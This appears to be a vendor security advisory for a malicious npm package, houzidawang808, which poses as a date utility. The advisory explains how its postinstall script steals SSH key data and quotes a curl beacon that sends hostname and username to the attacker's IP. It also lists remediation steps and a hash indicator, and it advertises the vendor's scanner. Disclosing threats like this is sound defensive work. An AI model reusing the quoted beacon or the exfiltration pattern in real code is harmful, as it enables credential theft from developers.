Which versions of houzidawang808 are malicious?

The following npm versions of houzidawang808 are flagged malicious: 1.0.0. Treat any of these as compromised.

How do I remediate houzidawang808 if I installed it?

Remove houzidawang808 from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Is houzidawang808 part of a known attack campaign?

Yes — houzidawang808 is associated with the IN-MAL-2026-006300 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

Can O3 Security detect houzidawang808 in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking houzidawang808 and packages like it before any post-install script runs.

Malicious package

houzidawang808npm

Malicious code in houzidawang808 (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-5732

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall houzidawang808

What this malware does

The package presents itself as a 'simple date formatting utility' (index.js exports a trivial formatDate wrapper around toLocaleDateString), but ships a postinstall.js that runs automatically on npm install. The postinstall script reads the contents of the installer's ~/.ssh directory via fs.readdirSync, collects os.userInfo() username and platform information, and POSTs the data to https://124.221.154.135/post — a hardcoded bare-IP destination with no documented purpose. Chinese-language comments in the file explicitly describe it as SSH-key theft and C2 exfiltration. The package.json additionally declares a build script curl http://124.221.154.135//pre?h=$(hostname)&u=$(whoami) that beacons hostname/username over plain HTTP to the same attacker IP, confirming the infrastructure. The benign date-utility facade is a cover story for credential-harvesting on installer machines.

Malicious versions

1 flagged

1.0.0

Indicators of compromise (SHA-256)

71d6b96fe99e7f8503cb07df05d6b621dc8e8243fc7288844678d8aff043a654

Frequently asked questions

No. houzidawang808 on npm has been identified as a malicious package (version 1.0.0 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-006300

References

npmjs.com

Credits

Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection